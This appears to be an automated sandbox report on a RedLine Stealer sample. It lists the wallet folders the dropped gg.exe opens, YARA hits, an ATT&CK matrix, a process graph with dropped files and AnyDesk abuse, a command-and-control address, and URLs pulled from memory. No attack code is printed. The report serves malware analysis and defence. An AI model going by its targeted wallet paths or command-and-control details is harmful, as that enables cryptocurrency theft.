                                Source: C:\ProgramData\WinNet\gg.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Jump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\Jump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeFile opened: C:\Users\user\AppData\Roaming\atomic\
                                Source: C:\ProgramData\WinNet\gg.exeFile opened: C:\Users\user\AppData\Roaming\Binance\
                                Source: C:\ProgramData\WinNet\gg.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\
                                Source: C:\ProgramData\WinNet\gg.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\
                                Source: C:\ProgramData\WinNet\gg.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                                Source: C:\ProgramData\WinNet\gg.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                                Source: C:\ProgramData\WinNet\gg.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                                Source: C:\ProgramData\WinNet\gg.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                                Source: C:\ProgramData\WinNet\gg.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
                                Source: C:\ProgramData\WinNet\gg.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                                Source: C:\ProgramData\WinNet\gg.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                                Source: C:\ProgramData\WinNet\gg.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\
                                Source: C:\ProgramData\WinNet\gg.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\
                                Source: C:\ProgramData\WinNet\gg.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
                                Source: Yara matchFile source: 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000012.00000002.1807448246.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.1935874670.0000000003185000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000E.00000002.1805798526.0000000002FD3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: gg.exe PID: 6160, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: gg.exe PID: 2228, type: MEMORYSTR

                                Remote Access Functionality

                                barindex
                                Yara detected RedLine Stealer
                                Source: Yara matchFile source: dump.pcap, type: PCAP
                                Source: Yara matchFile source: 0.2.SysrI6zSkJ.exe.231d8f00098.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 7.2.embedded.exe.1a0bad00098.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.2.SysrI6zSkJ.exe.231d8f00098.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 7.2.embedded.exe.1a0bad00098.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.gg.exe.7a0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000007.00000002.2884514638.000001A0BAD00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000002.2883966376.00000231D8F00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000E.00000000.1640888434.00000000007A2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.1935874670.0000000003185000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: SysrI6zSkJ.exe PID: 6472, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: embedded.exe PID: 6904, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: gg.exe PID: 6160, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: gg.exe PID: 2228, type: MEMORYSTR
                                Source: Yara matchFile source: C:\ProgramData\WinNet\gg.exe, type: DROPPED

                                Mitre Att&ck Matrix

                                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                Gather Victim Identity Information11
                                Scripting                                		1
                                Valid Accounts                                		531
                                Windows Management Instrumentation                                		11
                                Scripting                                		1
                                DLL Side-Loading                                		1
                                Disable or Modify Tools                                		1
                                OS Credential Dumping                                		12
                                System Time Discovery                                		Remote Services1
                                Archive Collected Data                                		12
                                Encrypted Channel                                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                                CredentialsDomainsDefault Accounts12
                                Command and Scripting Interpreter                                		1
                                DLL Side-Loading                                		1
                                Valid Accounts                                		1
                                Deobfuscate/Decode Files or Information                                		21
                                Input Capture                                		1
                                File and Directory Discovery                                		Remote Desktop Protocol3
                                Data from Local System                                		1
                                Non-Standard Port                                		Exfiltration Over BluetoothNetwork Denial of Service
                                Email AddressesDNS ServerDomain AccountsAt1
                                Valid Accounts                                		1
                                Access Token Manipulation                                		3
                                Obfuscated Files or Information                                		Security Account Manager156
                                System Information Discovery                                		SMB/Windows Admin Shares21
                                Input Capture                                		2
                                Non-Application Layer Protocol                                		Automated ExfiltrationData Encrypted for Impact
                                Employee NamesVirtual Private ServerLocal AccountsCron1
                                Registry Run Keys / Startup Folder                                		11
                                Process Injection                                		1
                                Software Packing                                		NTDS651
                                Security Software Discovery                                		Distributed Component Object ModelInput Capture13
                                Application Layer Protocol                                		Traffic DuplicationData Destruction
                                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
                                Registry Run Keys / Startup Folder                                		1
                                Timestomp                                		LSA Secrets1
                                Process Discovery                                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                                DLL Side-Loading                                		Cached Domain Credentials441
                                Virtualization/Sandbox Evasion                                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                                Masquerading                                		DCSync1
                                Application Window Discovery                                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                                Valid Accounts                                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                                Modify Registry                                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                                Access Token Manipulation                                		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                                Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd441
                                Virtualization/Sandbox Evasion                                		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                                Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task11
                                Process Injection                                		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                                Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers1
                                Hidden Files and Directories                                		GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service
                                Business RelationshipsServerTrusted RelationshipVisual BasicContainer Orchestration JobContainer Orchestration Job1
                                Rundll32                                		Web Portal CaptureLocal GroupsComponent Object Model and Distributed COMLocal Email CollectionInternal ProxyCommonly Used PortDirect Network Flood

                                Behavior Graph

                                Hide Legend

                                Legend:

                                • Process
                                • Signature
                                • Created File
                                • DNS/IP Info
                                • Is Dropped
                                • Is Windows Process
                                • Number of created Registry Values
                                • Number of created Files
                                • Visual Basic
                                • Delphi
                                • Java
                                • .Net C# or VB.NET
                                • C, C++ or other language
                                • Is malicious
                                • Internet
                                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1402122 Sample: SysrI6zSkJ.exe Startdate: 03/03/2024 Architecture: WINDOWS Score: 76 79 relay-6a630189.net.anydesk.com 2->79 81 d1atxff5avezsq.cloudfront.net 2->81 83 2 other IPs or domains 2->83 95 Snort IDS alert for network traffic 2->95 97 Found malware configuration 2->97 99 Multi AV Scanner detection for submitted file 2->99 101 4 other signatures 2->101 11 SysrI6zSkJ.exe 4 2->11         started        15 gg.exe 2->15         started        17 rundll32.exe 2->17         started        signatures3 process4 file5 69 C:\ProgramData\WinNet\gg.exe, PE32 11->69 dropped 71 C:\ProgramData\WinNet\embedded.exe, PE32+ 11->71 dropped 73 C:\ProgramData\WinNet\p.vbs, ASCII 11->73 dropped 109 Uses cmd line tools excessively to alter registry or file data 11->109 19 cmd.exe 1 11->19         started        21 cmd.exe 3 2 11->21         started        23 reg.exe 1 1 11->23         started        111 Tries to harvest and steal browser information (history, passwords, etc) 15->111 113 Tries to steal Crypto Currency Wallets 15->113 signatures6 process7 process8 25 embedded.exe 1 19->25         started        29 conhost.exe 19->29         started        31 wscript.exe 1 21->31         started        33 conhost.exe 21->33         started        35 conhost.exe 23->35         started        file9 67 C:\ProgramData\WinNet\AnyDesk.exe, PE32 25->67 dropped 103 Multi AV Scanner detection for dropped file 25->103 105 Uses cmd line tools excessively to alter registry or file data 25->105 37 cmd.exe 1 25->37         started        39 cmd.exe 25->39         started        41 reg.exe 1 25->41         started        107 Windows Scripting host queries suspicious COM object (likely to drop second stage) 31->107 43 gg.exe 5 4 31->43         started        signatures10 process11 dnsIp12 47 AnyDesk.exe 14 37->47         started        50 conhost.exe 37->50         started        52 wscript.exe 39->52         started        54 conhost.exe 39->54         started        56 conhost.exe 41->56         started        91 67.203.7.148, 2909, 49729, 49730 AS-COLOAMUS United States 43->91 115 Multi AV Scanner detection for dropped file 43->115 117 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 43->117 119 Found many strings related to Crypto-Wallets (likely being stolen) 43->119 121 2 other signatures 43->121 signatures13 process14 signatures15 123 Detected unpacking (changes PE section rights) 47->123 125 Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines) 47->125 127 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 47->127 129 3 other signatures 47->129 58 AnyDesk.exe 47->58         started        62 AnyDesk.exe 47->62         started        64 gg.exe 5 2 52->64         started        process16 dnsIp17 85 18.173.219.85, 49735, 80 MIT-GATEWAYSUS United States 58->85 87 relay-6a630189.net.anydesk.com 64.31.23.26, 443, 49733, 49734 LIMESTONENETWORKSUS United States 58->87 89 boot.net.anydesk.com 185.229.191.44, 443, 49731, 49732 CDN77GB Czech Republic 58->89 75 C:\Users\user\AppData\Local\Temp\gcapi.dll, PE32 58->75 dropped 77 C:\ProgramData\WinNet\gcapi.dll, PE32 58->77 dropped 93 Tries to steal Crypto Currency Wallets 64->93 file18 signatures19

                                Screenshots

                                Thumbnails

                                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                windows-stand

                                Antivirus, Machine Learning and Genetic Malware Detection

                                Initial Sample

                                SourceDetectionScannerLabelLink
                                SysrI6zSkJ.exe39%ReversingLabsWin64.Spyware.RedLine

                                Dropped Files

                                SourceDetectionScannerLabelLink
                                C:\ProgramData\WinNet\AnyDesk.exe0%ReversingLabs
                                C:\ProgramData\WinNet\embedded.exe58%ReversingLabsWin64.Spyware.RedLine
                                C:\ProgramData\WinNet\gcapi.dll0%ReversingLabs
                                C:\ProgramData\WinNet\gg.exe71%ReversingLabsByteCode-MSIL.Trojan.RedlineStealer
                                C:\Users\user\AppData\Local\Temp\gcapi.dll0%ReversingLabs

                                Unpacked PE Files

                                No Antivirus matches

                                Domains

                                No Antivirus matches

                                URLs

                                SourceDetectionScannerLabelLink
                                https://api.ip.sb/ip0%URL Reputationsafe
                                http://tempuri.org/Entity/Id12Response0%Avira URL Cloudsafe
                                http://tempuri.org/Entity/Id13ResponseD0%Avira URL Cloudsafe
                                http://tempuri.org/Entity/Id23ResponseD0%Avira URL Cloudsafe
                                http://tempuri.org/0%Avira URL Cloudsafe
                                http://tempuri.org/Entity/Id6ResponseD0%Avira URL Cloudsafe
                                http://tempuri.org/Entity/Id2Response0%Avira URL Cloudsafe
                                http://tempuri.org/Entity/Id21Response0%Avira URL Cloudsafe
                                http://tempuri.org/Entity/Id15Response0%Avira URL Cloudsafe
                                http://tempuri.org/Entity/Id1ResponseD0%Avira URL Cloudsafe
                                http://tempuri.org/Entity/Id24Response0%Avira URL Cloudsafe
                                http://tempuri.org/Entity/Id10ResponseD0%Avira URL Cloudsafe
                                http://tempuri.org/Entity/Id21ResponseD0%Avira URL Cloudsafe
                                http://tempuri.org/Entity/Id5Response0%Avira URL Cloudsafe
                                http://tempuri.org/Entity/Id8Response0%Avira URL Cloudsafe
                                http://tempuri.org/Entity/Id15ResponseD0%Avira URL Cloudsafe
                                67.203.7.148:29090%Avira URL Cloudsafe
                                http://tempuri.org/Entity/Id10Response0%Avira URL Cloudsafe
                                http://tempuri.org/D0%Avira URL Cloudsafe
                                https://dartbug.com/52121.0%Avira URL Cloudsafe
                                http://tempuri.org/Entity/Id12ResponseD0%Avira URL Cloudsafe
                                http://tempuri.org/Entity/Id13Response0%Avira URL Cloudsafe
                                http://tempuri.org/Entity/Id7ResponseD0%Avira URL Cloudsafe

                                Domains and IPs

                                Contacted Domains

                                NameIPActiveMaliciousAntivirus DetectionReputation
                                relay-6a630189.net.anydesk.com
                                		64.31.23.26
                                		truefalse
                                  		high
                                  d1atxff5avezsq.cloudfront.net
                                  		18.173.219.36
                                  		truefalse
                                    		high
                                    boot.net.anydesk.com
                                    		185.229.191.44
                                    		truefalse
                                      		high
                                      api.playanext.com
                                      		unknown
                                      		unknownfalse
                                        		unknown

                                        Contacted URLs

                                        NameMaliciousAntivirus DetectionReputation
                                        67.203.7.148:2909true
                                        • Avira URL Cloud: safe
                                        		unknown

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Textgg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://schemas.xmlsoap.org/ws/2005/02/sc/sctgg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://schemas.xmlsoap.org/ws/2004/04/security/sc/dkgg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://duckduckgo.com/ac/?q=gg.exe, 0000000E.00000002.1811038264.0000000003F5E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://support.anydesk.com/knowledge/usersAnyDesk.exe, 00000010.00000003.1664717237.000000000400B000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpfalse
                                                  		high
                                                  http://tempuri.org/Entity/Id23ResponseDgg.exe, 0000000E.00000002.1805798526.0000000002FD3000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000036B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://support.google.com/chrome/contact/chromeuninstall3?hl=$1AnyDesk.exefalse
                                                    		high
                                                    https://anydesk.com/updateAnyDesk.exe, 00000010.00000003.1664717237.000000000400B000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpfalse
                                                      		high
                                                      http://tempuri.org/Entity/Id12Responsegg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://tempuri.org/gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://tempuri.org/Entity/Id2Responsegg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://tempuri.org/Entity/Id21Responsegg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrapgg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLIDgg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://tempuri.org/Entity/Id6ResponseDgg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecretgg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://datatracker.ietf.org/ipr/1526/AnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpfalse
                                                                		high
                                                                https://policies.google.com/privacy?hl=$AnyDesk.exe, 00000010.00000003.1664717237.000000000400B000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpfalse
                                                                  		high
                                                                  https://help.anydesk.comAnyDesk.exe, 00000010.00000003.1664717237.000000000400B000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpfalse
                                                                    		high
                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issuegg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://my.anydesk.com/AnyDesk.exe, 00000010.00000002.2890701481.0000000003FA0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://schemas.xmlsoap.org/ws/2004/10/wsat/Abortedgg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequencegg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://tempuri.org/Entity/Id13ResponseDgg.exe, 0000000E.00000002.1805798526.0000000002FD3000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.000000000353B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://schemas.xmlsoap.org/ws/2004/10/wsat/faultgg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://schemas.xmlsoap.org/ws/2004/10/wsatgg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://support.anydesk.com/knowledge/what-is-full-client-managementAnyDesk.exe, 00000010.00000003.1664717237.000000000400B000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpfalse
                                                                                  		high
                                                                                  http://tempuri.org/Entity/Id15Responsegg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://support.anydesk.com/knowledge/account-migrationAnyDesk.exe, 00000010.00000002.2891142994.00000000043E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namegg.exe, 0000000E.00000002.1805798526.0000000002CC9000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renewgg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://schemas.xmlsoap.org/ws/2004/10/wscoor/Registergg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKeygg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://help.anydesk.com/AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpfalse
                                                                                              		high
                                                                                              https://my.anydesk.com/v2eAnyDesk.exe, 00000010.00000002.2891142994.00000000043E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://api.ip.sb/ipSysrI6zSkJ.exe, 00000000.00000002.2883966376.00000231D8F00000.00000004.00001000.00020000.00000000.sdmp, embedded.exe, 00000007.00000002.2884514638.000001A0BAD00000.00000004.00001000.00020000.00000000.sdmp, gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 0000000E.00000000.1640888434.00000000007A2000.00000002.00000001.01000000.00000007.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                https://support.anydesk.com/knowledge/status-anynet_overloadAnyDesk.exe, 00000010.00000003.1664717237.000000000400B000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmpfalse
                                                                                                  		high
                                                                                                  https://anydesk.com/contact/sales)AnyDesk.exe, 00000010.00000003.1663509478.000000000404F000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2891142994.00000000043E0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000003.1663258383.0000000004088000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://tempuri.org/Entity/Id1ResponseDgg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancelgg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=gg.exe, 0000000E.00000002.1811038264.0000000003F5E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://tempuri.org/Entity/Id24Responsegg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          https://www.ecosia.org/newtab/gg.exe, 0000000E.00000002.1811038264.0000000003F5E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequestedgg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnegogg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://tempuri.org/Entity/Id21ResponseDgg.exe, 0000000E.00000002.1805798526.0000000002CC9000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.000000000353B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
